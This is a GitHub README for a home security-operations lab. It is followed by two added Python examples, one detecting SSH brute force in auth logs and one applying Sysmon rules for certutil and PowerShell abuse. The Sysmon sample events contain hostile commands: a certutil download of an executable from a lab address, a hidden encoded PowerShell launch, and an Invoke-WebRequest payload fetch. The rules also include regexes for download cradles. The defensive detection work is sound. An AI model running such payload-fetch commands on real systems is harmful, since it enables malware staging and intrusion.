MiguelKnt/Security-Operations-Detection-Engineering-Platform

GitHub: MiguelKnt/Security-Operations-Detection-Engineering-Platform


# Security Operations & Detection Engineering Platform

## Overview

Designed and deployed a multi-platform Security Operations environment utilizing Splunk Enterprise, Sysmon, Windows 11, Kali Linux, Ubuntu Server, and Splunk Universal Forwarders to simulate enterprise SOC operations, centralized telemetry collection, detection engineering, threat hunting, and incident investigation workflows.

This project focuses on building security visibility, validating detection coverage, investigating security events, and developing practical security operations skills through hands-on adversary simulation and telemetry analysis.

## Technologies Used

- Splunk Enterprise
- Sysmon
- Splunk Universal Forwarder
- Windows 11
- Kali Linux
- Ubuntu Server
- Atomic Red Team
- Nmap
- Hydra
- PowerShell
- MITRE ATT&CK Framework

## Key Capabilities

- Centralized log collection and telemetry ingestion
- Endpoint visibility through Sysmon
- Detection engineering and alert validation
- Security monitoring and event correlation
- Threat hunting workflows
- Incident investigation and analysis
- ATT&CK-aligned adversary simulation
- Network reconnaissance detection
- SSH brute-force detection
- HTTP beaconing analysis
- PowerShell abuse detection
- Living-off-the-Land (LOLBin) abuse detection using Certutil

## Security Activities Performed

### Detection Engineering

Developed and validated detections designed to identify suspicious activity across Windows and Linux environments, leveraging Splunk searches, alerting logic, and Sysmon telemetry.

### Adversary Simulation

Executed controlled attack simulations to generate security telemetry and validate monitoring coverage.

Activities included:

- Network reconnaissance using Nmap
- SSH brute-force attacks using Hydra
- HTTP beaconing simulations
- PowerShell execution testing
- Certutil LOLBin abuse simulations

### Threat Hunting & Investigation

Performed investigation and threat hunting activities by correlating endpoint, authentication, application, and network telemetry to identify attacker-attributed behavior and validate detections.

## Skills Demonstrated

- Security Operations (SOC)
- Detection Engineering
- Threat Hunting
- Incident Investigation
- Security Monitoring
- Log Analysis
- SIEM Administration
- Threat Detection
- Endpoint Telemetry Analysis
- MITRE ATT&CK Mapping
- Windows Security Monitoring
- Linux Security Monitoring

## Project Documentation

The complete project walkthrough, screenshots, detection examples, investigations, and technical documentation can be viewed below:

📄 **Project Documentation**

[Security Operations & Detection Engineering Platform – Part 1](https://github.com/MiguelKnt/Security-Operations-Detection-Engineering-Platform/blob/main/Security_Operations_and_Detection_Engineering_Platform_Part_1.pdf)

## Future Enhancements

Planned enhancements include:

- Security orchestration and automated response (SOAR)
- Expanded ATT&CK coverage
- Additional threat hunting scenarios
- AI-assisted alert triage workflows
- Automated investigation workflows
- Detection tuning and optimization
- Enhanced dashboarding and reporting

*This project was developed as part of an ongoing effort to strengthen practical skills in security operations, detection engineering, threat hunting, and enterprise security monitoring.*
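## Example: SSH brute-force detection logic

The README lists SSH brute-force detection against Hydra activity among the detections built on authentication telemetry. The script below is an added example, not code from this repository, showing the correlation logic such a detection implements: count failed `sshd` logins per source address inside a sliding time window, raise one alert per source when the count reaches a threshold, and enrich the alert if the same source later logs in successfully. The log lines, host name `ubuntu-srv`, addresses and the `parse_ts` year assumption are all constructed for the example.

```python
"""Threshold-based SSH brute-force detection over Linux authentication logs.

Added example for this README, not code from the repository. It reproduces
the logic of a SIEM correlation search: count failed sshd logins per source
address in a sliding time window, raise one alert per source when the count
reaches a threshold, and enrich that alert if the same source later logs in
successfully. Every log line below is constructed sample data.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Accepted "
    r"(?:password|publickey) for (?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)

# Constructed auth.log excerpt: one noisy source, then one legitimate user
# who mistypes a password once and logs in with a key afterwards.
SAMPLE_LOG = """\
Mar 14 10:00:01 ubuntu-srv sshd[2201]: Failed password for invalid user admin from 192.168.56.101 port 51000 ssh2
Mar 14 10:00:02 ubuntu-srv sshd[2203]: Failed password for invalid user admin from 192.168.56.101 port 51001 ssh2
Mar 14 10:00:03 ubuntu-srv sshd[2205]: Failed password for root from 192.168.56.101 port 51002 ssh2
Mar 14 10:00:04 ubuntu-srv sshd[2207]: Failed password for root from 192.168.56.101 port 51003 ssh2
Mar 14 10:00:05 ubuntu-srv sshd[2209]: Failed password for root from 192.168.56.101 port 51004 ssh2
Mar 14 10:00:06 ubuntu-srv sshd[2211]: Failed password for root from 192.168.56.101 port 51005 ssh2
Mar 14 10:00:09 ubuntu-srv sshd[2213]: Accepted password for root from 192.168.56.101 port 51006 ssh2
Mar 14 10:05:00 ubuntu-srv sshd[2301]: Failed password for alice from 10.0.0.5 port 40000 ssh2
Mar 14 10:05:30 ubuntu-srv sshd[2303]: Accepted publickey for alice from 10.0.0.5 port 40001 ssh2
"""


def parse_ts(ts, year=2024):
    """auth.log timestamps carry no year; assume one (constructed) so they compare correctly."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_ssh_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return a list of alert dicts, one per source that crossed the threshold."""
    recent = defaultdict(deque)   # src -> failure timestamps still inside the window
    total = defaultdict(int)      # src -> every failure seen, for the alert summary
    users = defaultdict(set)      # src -> usernames tried (password spraying shows up here)
    alerts = {}                   # src -> alert, emitted once per source
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            src, ts = m["src"], parse_ts(m["ts"])
            total[src] += 1
            users[src].add(m["user"])
            q = recent[src]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()       # slide the window forward
            if len(q) >= threshold and src not in alerts:
                alerts[src] = {
                    "src": src, "first_failure": q[0], "count": None, "users": None,
                    "success_after": None,
                    "attack": "T1110.001 Brute Force: Password Guessing",
                }
            continue
        m = ACCEPTED_RE.match(line)
        if m and m["src"] in alerts:
            # A success from an already-flagged source is the high-priority case
            alerts[m["src"]]["success_after"] = (m["user"], parse_ts(m["ts"]))
    for src, alert in alerts.items():
        alert["count"] = total[src]
        alert["users"] = sorted(users[src])
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_LOG):
        print(alert)
```

The single failure from `10.0.0.5` never reaches the threshold, which is the false-positive case a threshold rule must tolerate; the `success_after` field is what turns a noisy brute-force alert into an incident. In Splunk the same logic is a search of the general shape `"Failed password" | bin _time span=1m | stats count dc(user) AS users BY src _time | where count >= 5`, with the field names depending on the extractions configured for the forwarded log.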
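## Example: Sysmon LOLBin and PowerShell detection rules

The Key Capabilities section names PowerShell abuse detection and Certutil LOLBin detection built on Sysmon telemetry. The code below is an added example, not the repository's own Splunk searches, showing how those detections are expressed as rules over Sysmon process-creation events (Event ID 1) and, just as importantly, how benign uses of the same binaries are left alone. The events are constructed dictionaries shaped like the fields Splunk extracts from Sysmon XML (`Image`, `CommandLine`, `ParentImage`, `User`, `UtcTime`, `Computer`); the host name, user, addresses and the harmless base64 string `QQBCAEMA` (UTF-16LE "ABC") are all made up for the example.

```python
"""Endpoint detection rules over Sysmon process-creation events (Event ID 1).

Added example for this README, not the repository's own Splunk searches.
Each rule encodes widely published detection criteria for two behaviours
listed under Key Capabilities: certutil used as a LOLBin, and PowerShell
invoked with encoded, hidden-window or download-cradle arguments. Events
are constructed dictionaries shaped like Splunk's Sysmon field extractions.
"""
import re
from dataclasses import dataclass
from typing import Callable


@dataclass
class Rule:
    name: str
    technique: str          # ATT&CK mapping used when the alert is raised
    match: Callable[[dict], bool]


def _image(ev):
    """Basename of the executed image, lower-cased."""
    return ev.get("Image", "").rsplit("\\", 1)[-1].lower()


def _cmd(ev):
    return ev.get("CommandLine", "").lower()


def _is_powershell(ev):
    return _image(ev) in ("powershell.exe", "pwsh.exe")


# certutil has legitimate certificate-management uses; alert only on the
# download/decode switches that have no routine use on a workstation.
CERTUTIL_SUSPICIOUS = ("-urlcache", "-decode", "-encode")

# PowerShell accepts abbreviated parameters, so -e, -ec, -en, -enc ... all mean
# -EncodedCommand. -ExecutionPolicy does not match because "x" follows "-e".
PS_ENCODED = re.compile(r"(?:^|\s)-e(?:[cn]|nc[a-z]*)?\s")
PS_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b")
PS_HIDDEN = re.compile(r"-(?:w|windowstyle)\s+hidden|-nop\b|-noprofile\b")

RULES = [
    Rule("Certutil LOLBin download or decode", "T1105 / T1140",
         lambda ev: _image(ev) == "certutil.exe"
         and any(flag in _cmd(ev) for flag in CERTUTIL_SUSPICIOUS)),
    Rule("PowerShell encoded command", "T1059.001 / T1027",
         lambda ev: _is_powershell(ev) and bool(PS_ENCODED.search(_cmd(ev)))),
    Rule("PowerShell download cradle", "T1059.001 / T1105",
         lambda ev: _is_powershell(ev) and bool(PS_CRADLE.search(_cmd(ev)))),
    Rule("PowerShell hidden window or no profile", "T1059.001 / T1564.003",
         lambda ev: _is_powershell(ev) and bool(PS_HIDDEN.search(_cmd(ev)))),
]

# Constructed Sysmon Event ID 1 records: three suspicious, three benign.
_HOST = {"EventID": 1, "Computer": "WIN11-LAB", "User": "WIN11-LAB\\analyst"}
SAMPLE_EVENTS = [
    {**_HOST, "UtcTime": "2024-03-14 10:12:01", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://192.168.56.102/tool.exe tool.exe"},
    {**_HOST, "UtcTime": "2024-03-14 10:12:30", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -verify C:\\certs\\lab-ca.cer"},
    {**_HOST, "UtcTime": "2024-03-14 10:13:05", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBCAEMA"},
    {**_HOST, "UtcTime": "2024-03-14 10:13:40", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -Command \"Get-Process | Sort-Object CPU\""},
    {**_HOST, "UtcTime": "2024-03-14 10:14:10", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -Command \"Invoke-WebRequest http://192.168.56.102/stage.ps1 -OutFile C:\\Users\\Public\\stage.ps1\""},
    {**_HOST, "UtcTime": "2024-03-14 10:15:00", "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]


def run_rules(events, rules=RULES):
    """Evaluate every rule against every process-creation event; one hit per (event, rule)."""
    hits = []
    for ev in events:
        if str(ev.get("EventID", 1)) != "1":
            continue    # only Event ID 1 carries Image/CommandLine/ParentImage
        for rule in rules:
            if rule.match(ev):
                hits.append({"time": ev["UtcTime"], "host": ev["Computer"], "user": ev["User"],
                             "rule": rule.name, "technique": rule.technique,
                             "parent": ev["ParentImage"].rsplit("\\", 1)[-1],
                             "cmd": ev["CommandLine"]})
    return hits


if __name__ == "__main__":
    for hit in run_rules(SAMPLE_EVENTS):
        print(f'{hit["time"]} {hit["host"]} [{hit["technique"]}] {hit["rule"]}: {hit["cmd"]}')
```

Two of the sample events show where tuning lives: `certutil -verify` and `powershell -ExecutionPolicy Bypass -File` are routine administration and produce no hit, while the encoded, hidden-window invocation fires two rules at once, which is the kind of overlap worth correlating into a single alert rather than paging twice. The `ParentImage` field is carried through because parent context (here `cmd.exe` versus `explorer.exe`) is usually the first pivot in the investigation.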